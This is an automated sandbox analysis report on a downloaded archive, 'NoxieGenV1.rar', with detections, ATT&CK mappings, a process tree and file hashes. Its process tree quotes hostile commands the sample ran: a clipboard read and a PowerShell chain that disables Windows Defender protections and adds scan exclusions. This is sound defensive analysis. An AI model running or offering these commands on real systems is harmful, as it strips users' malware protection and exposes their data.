hxxps://gofile[.]io/d/bLjssM

Resubmissions

19/02/2024, 16:58

240219-vgxdlsgg4s 1

19/02/2024, 16:54

19/02/2024, 16:51

19/02/2024, 16:48

19/02/2024, 16:42

19/02/2024, 16:38

Analysis

max time kernel
149s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
19/02/2024, 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/bLjssM

Score

7^/10

persistence pyinstaller upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4852	NoxieV1.32.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000021762-348.dat	upx
behavioral1/files/0x0006000000021762-349.dat	upx
behavioral1/memory/4240-351-0x00007FFBE4150000-0x00007FFBE4738000-memory.dmp	upx
behavioral1/files/0x000200000001e7ef-354.dat	upx
behavioral1/memory/4240-360-0x00007FFBFEDE0000-0x00007FFBFEE04000-memory.dmp	upx
behavioral1/files/0x000200000001e9d4-361.dat	upx
behavioral1/files/0x000200000001e7ed-364.dat	upx
behavioral1/memory/4240-365-0x00007FFBFEDB0000-0x00007FFBFEDC9000-memory.dmp	upx
behavioral1/files/0x000200000001e7ed-363.dat	upx
behavioral1/memory/4240-368-0x00007FFBFED80000-0x00007FFBFEDAD000-memory.dmp	upx
behavioral1/files/0x000200000001e7fa-386.dat	upx
behavioral1/files/0x000200000001e7f9-385.dat	upx
behavioral1/memory/4240-390-0x00007FFBFED60000-0x00007FFBFED79000-memory.dmp	upx
behavioral1/files/0x000b000000021876-391.dat	upx
behavioral1/memory/4240-392-0x00007FFBFED50000-0x00007FFBFED5D000-memory.dmp	upx
behavioral1/files/0x000200000001e7f6-389.dat	upx
behavioral1/memory/4240-394-0x00007FFBFBBA0000-0x00007FFBFBBD5000-memory.dmp	upx
behavioral1/files/0x000c00000002181f-396.dat	upx
behavioral1/memory/4240-398-0x00007FFBFD5B0000-0x00007FFBFD5DE000-memory.dmp	upx
behavioral1/memory/4240-397-0x00007FFBFED40000-0x00007FFBFED4D000-memory.dmp	upx
behavioral1/memory/4240-400-0x00007FFBE69C0000-0x00007FFBE6A7C000-memory.dmp	upx
behavioral1/memory/4240-399-0x00007FFBE4150000-0x00007FFBE4738000-memory.dmp	upx
behavioral1/memory/4240-402-0x00007FFBFBB70000-0x00007FFBFBB9B000-memory.dmp	upx
behavioral1/memory/4240-401-0x00007FFBFEDE0000-0x00007FFBFEE04000-memory.dmp	upx
behavioral1/files/0x000200000001e7f5-395.dat	upx
behavioral1/files/0x000200000001eb16-393.dat	upx
behavioral1/files/0x000200000001e7f8-384.dat	upx
behavioral1/files/0x000200000001e7f4-381.dat	upx
behavioral1/memory/4240-403-0x00007FFBFBAD0000-0x00007FFBFBAFE000-memory.dmp	upx
behavioral1/memory/4240-404-0x00007FFBE6900000-0x00007FFBE69B8000-memory.dmp	upx
behavioral1/memory/4240-405-0x00007FFBFED80000-0x00007FFBFEDAD000-memory.dmp	upx
behavioral1/memory/4240-406-0x00007FFBE6580000-0x00007FFBE68F5000-memory.dmp	upx
behavioral1/memory/4240-408-0x00007FFBFED60000-0x00007FFBFED79000-memory.dmp	upx
behavioral1/memory/4240-409-0x00007FFBF7B70000-0x00007FFBF7B85000-memory.dmp	upx
behavioral1/memory/4240-410-0x00007FFBF7B10000-0x00007FFBF7B22000-memory.dmp	upx
behavioral1/memory/4240-413-0x00007FFBF7AE0000-0x00007FFBF7B03000-memory.dmp	upx
behavioral1/memory/4240-414-0x00007FFBE6190000-0x00007FFBE6303000-memory.dmp	upx
behavioral1/files/0x000200000001e7f1-379.dat	upx
behavioral1/files/0x000200000001e7f0-378.dat	upx
behavioral1/memory/4240-415-0x00007FFBF7800000-0x00007FFBF7818000-memory.dmp	upx
behavioral1/files/0x000200000001e7ec-376.dat	upx
behavioral1/memory/4240-417-0x00007FFBF7490000-0x00007FFBF74A4000-memory.dmp	upx
behavioral1/memory/4240-419-0x00007FFBFD390000-0x00007FFBFD39B000-memory.dmp	upx
behavioral1/memory/4240-421-0x00007FFBF7460000-0x00007FFBF7486000-memory.dmp	upx
behavioral1/memory/4240-420-0x00007FFBFBAD0000-0x00007FFBFBAFE000-memory.dmp	upx
behavioral1/memory/4240-423-0x00007FFBE5F40000-0x00007FFBE605C000-memory.dmp	upx
behavioral1/memory/4240-422-0x00007FFBE6900000-0x00007FFBE69B8000-memory.dmp	upx
behavioral1/memory/4240-432-0x00007FFBF7B60000-0x00007FFBF7B6C000-memory.dmp	upx
behavioral1/memory/4240-435-0x00007FFBF6980000-0x00007FFBF698C000-memory.dmp	upx
behavioral1/memory/4240-439-0x00007FFBE6190000-0x00007FFBE6303000-memory.dmp	upx
behavioral1/memory/4240-444-0x00007FFBEDBF0000-0x00007FFBEDBFD000-memory.dmp	upx
behavioral1/memory/4240-445-0x00007FFBE8800000-0x00007FFBE8812000-memory.dmp	upx
behavioral1/memory/4240-447-0x00007FFBF7460000-0x00007FFBF7486000-memory.dmp	upx
behavioral1/memory/4240-448-0x00007FFBEDC20000-0x00007FFBEDC58000-memory.dmp	upx
behavioral1/memory/4240-449-0x00007FFBE3EC0000-0x00007FFBE4143000-memory.dmp	upx
behavioral1/memory/4240-450-0x00007FFBE87E0000-0x00007FFBE87EA000-memory.dmp	upx
behavioral1/memory/4240-446-0x00007FFBE87F0000-0x00007FFBE87FC000-memory.dmp	upx
behavioral1/memory/4240-451-0x00007FFBE87B0000-0x00007FFBE87D9000-memory.dmp	upx
behavioral1/memory/4240-443-0x00007FFBEDC00000-0x00007FFBEDC0C000-memory.dmp	upx
behavioral1/memory/4240-442-0x00007FFBEDC10000-0x00007FFBEDC1C000-memory.dmp	upx
behavioral1/memory/4240-441-0x00007FFBEE2A0000-0x00007FFBEE2AB000-memory.dmp	upx
behavioral1/memory/4240-440-0x00007FFBEE2B0000-0x00007FFBEE2BB000-memory.dmp	upx
behavioral1/memory/4240-438-0x00007FFBF7AE0000-0x00007FFBF7B03000-memory.dmp	upx
behavioral1/memory/4240-437-0x00007FFBF4E20000-0x00007FFBF4E2C000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NoxieV1.32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
104	raw.githubusercontent.com
103	raw.githubusercontent.com

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0004000000000749-239.dat	pyinstaller
behavioral1/files/0x0004000000000749-238.dat	pyinstaller
behavioral1/files/0x0004000000000749-347.dat	pyinstaller

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1400	msedge.exe
1400	msedge.exe
1792	msedge.exe
1792	msedge.exe
2356	identity_helper.exe
2356	identity_helper.exe
4632	msedge.exe
4632	msedge.exe
3496	msedge.exe
3496	msedge.exe
3496	msedge.exe
3496	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3684	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	3684	7zFM.exe
Token: 35	3684	7zFM.exe
Token: SeRestorePrivilege	3804	7zG.exe
Token: 35	3804	7zG.exe
Token: SeSecurityPrivilege	3804	7zG.exe
Token: SeSecurityPrivilege	3804	7zG.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
3684	7zFM.exe
3804	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe
1792	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 4928	1792	msedge.exe	87
PID 1792 wrote to memory of 4928	1792	msedge.exe	87
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 4396	1792	msedge.exe	88
PID 1792 wrote to memory of 1400	1792	msedge.exe	89
PID 1792 wrote to memory of 1400	1792	msedge.exe	89
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90
PID 1792 wrote to memory of 5064	1792	msedge.exe	90

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/bLjssM
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbf77546f8,0x7ffbf7754708,0x7ffbf7754718
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:2140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
  2⤵
  PID:768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
  2⤵
  PID:2640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8
  2⤵
  PID:2456
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4052 /prefetch:8
  2⤵
  PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
  2⤵
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4632
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\NoxieGenV1.rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,15670649993864581283,7275266027187819608,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3020 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3840

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3228

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap32563:82:7zEvent29477
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3804

C:\Users\Admin\Downloads\NoxieGenV1\NoxieV1.32.exe
"C:\Users\Admin\Downloads\NoxieGenV1\NoxieV1.32.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4852
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\noxie1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\noxie1.EXE
  2⤵
  PID:1076
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\main.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\main.exe
    3⤵
    PID:3540
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\main.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\main.exe
      4⤵
      PID:4240
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:4020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        
        PID:2348
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        
        PID:640
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
        5⤵
        
        PID:3028
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        
        PID:2132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
efc9c7501d0a6db520763baad1e05ce8

SHA1
60b5e190124b54ff7234bb2e36071d9c8db8545f

SHA256
7af7b56e2f0a84ae008785726f3404eb9001baa4b5531d0d618c6bdcb05a3a7a

SHA512
bda611ddba56513a30295ea5ca8bc59e552154f860d13fed97201cdb81814dd6d1bca7deca6f8f58c9ae585d91e450f4383a365f80560f4b8e59a4c8b53c327d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
99636fce3f4979be95347b080ce4e270

SHA1
fd1a12e4fd35dfe4c4e92239153dd29af0ec6f8b

SHA256
249952781150a5c908c25661364c556fbd8ef6774e8b6ad2be74fcf10498ecdc

SHA512
efb98e2aca2647ae3594f21e0e25ebdd7fd0469613af76db600a82d2adbbe5bd70afb8abf03de0053e2a79f47b0ddb5d60b3ff0928b6ec9dc7e6ddb354ad031a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
782B

MD5
c84bc10e54be1f79ad4045a564dcec7c

SHA1
e5659309f140cdd96f63e40bfe0aeecd77cc694f

SHA256
5d4b1741252b0c3cd10ad9048c0ad033dbe67b59b0c6420bd36e92e46f8b6753

SHA512
